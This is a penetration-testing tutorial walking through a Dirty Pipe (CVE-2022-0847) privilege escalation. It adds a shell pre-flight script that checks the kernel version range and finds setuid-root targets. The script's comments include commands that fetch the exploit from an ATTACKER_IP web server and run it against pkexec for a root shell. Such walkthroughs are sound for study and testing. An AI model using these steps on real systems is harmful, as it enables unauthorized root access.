May 9, 2022
In this tutorial, we will see how to perform a privilege escalation attack using the Dirty Pipe exploit. Dirty Pipe (CVE-2022-0847) takes advantage of a vulnerability in the Linux kernel's pipe handling that allows an unprivileged user to overwrite data in the page cache of arbitrary files they can only read, including setuid-root binaries. This leads to privilege escalation because unprivileged processes can inject code into root processes.
This page contains more information about the Dirty Pipe exploit.
The following screenshots from GitHub show some information about the Dirty Pipe exploit.
Let's download the exploit from GitHub.
Compiling the exploit source with gcc produces a Linux executable, which we will upload to the target.
On the target, wget downloads the file from the Python web server running on our attacking machine. We have to set the executable bit as well.
The file has been retrieved from the Python web server.
This exploit requires a setuid-root binary that the current user can execute, because it overwrites part of that binary with its payload. We can see that the pkexec binary meets the criteria.
Executing the exploit against the SUID binary gives us a root shell on the box.
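As an added example (not code from the original post, and not the exploit itself), here is a POSIX shell pre-flight script that bundles the checks a practitioner would want before running the steps above: whether the reported kernel version falls in the affected range (the bug was introduced in 5.8 and fixed in 5.16.11, 5.15.25 and 5.10.102 according to the public advisory), and which setuid-root binaries are available as targets. The exploit file name `exploit`, the listening port 8000, the `ATTACKER_IP` placeholder and the `/usr/bin/pkexec` path are assumptions.

```shell
#!/bin/sh
# Added pre-flight helper for the Dirty Pipe walkthrough; not the exploit itself
# and not code from the original post. The names "exploit", port 8000 and the
# ATTACKER_IP placeholder below are assumptions.

# Turn "MAJOR.MINOR.PATCH" into one comparable integer (5.10.102 -> 5010102).
ver_to_int() {
    _ifs=$IFS
    IFS=.
    set -- $1
    IFS=$_ifs
    echo $(( ${1:-0} * 1000000 + ${2:-0} * 1000 + ${3:-0} ))
}

# Exit 0 when a kernel release string looks like it is in the affected range:
# introduced in 5.8; fixed in 5.16.11, 5.15.25 and 5.10.102; 5.17+ never affected.
# Stable series between 5.8 and 5.16 with no listed fix are treated as unfixed.
dirtypipe_vulnerable() {
    # Drop the distro suffix: "5.13.0-30-generic" -> "5.13.0".
    v=$(printf '%s\n' "$1" | sed 's/[^0-9.].*$//')
    n=$(ver_to_int "$v")
    [ "$n" -ge "$(ver_to_int 5.8)" ] || return 1
    case $(( n / 1000 )) in
        5010) [ "$n" -lt "$(ver_to_int 5.10.102)" ] ;;
        5015) [ "$n" -lt "$(ver_to_int 5.15.25)" ] ;;
        5016) [ "$n" -lt "$(ver_to_int 5.16.11)" ] ;;
        *)    [ "$n" -lt "$(ver_to_int 5.17)" ] ;;
    esac
}

# List setuid-root executables under a directory (default: the whole root fs).
# The exploit needs one the current user can read and execute, e.g. /usr/bin/pkexec.
find_suid_root() {
    find "${1:-/}" -xdev -type f -perm -4000 -user root 2>/dev/null
}

# Run the checks on the current box when invoked with "preflight".
if [ "${1:-}" = "preflight" ]; then
    rel=$(uname -r)
    if dirtypipe_vulnerable "$rel"; then
        echo "kernel $rel is in the Dirty Pipe range (5.8 <= v < fix)"
    else
        echo "kernel $rel is outside the Dirty Pipe range (or carries a backported fix; verify)"
    fi
    echo "setuid-root candidates:"
    find_suid_root /
    # Transfer and run, as in the walkthrough (attacker side, then target side):
    #   attacker$ gcc -o exploit exploit.c && python3 -m http.server 8000
    #   target$   wget http://ATTACKER_IP:8000/exploit && chmod +x exploit
    #   target$   ./exploit /usr/bin/pkexec
fi
```

Run it on the target as `sh preflight.sh preflight`. The version check is only a hint: distribution kernels backport fixes without changing the upstream version string, so the definitive test is whether the exploit actually succeeds in overwriting a file the user can only read. Also keep in mind that the overwrite lands in the page cache rather than on disk, but the modified copy stays cached until evicted, so prefer an exploit variant that restores the original bytes of pkexec once it has its root shell.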
If you liked reading this article, you can follow me on Twitter: mujtabareads.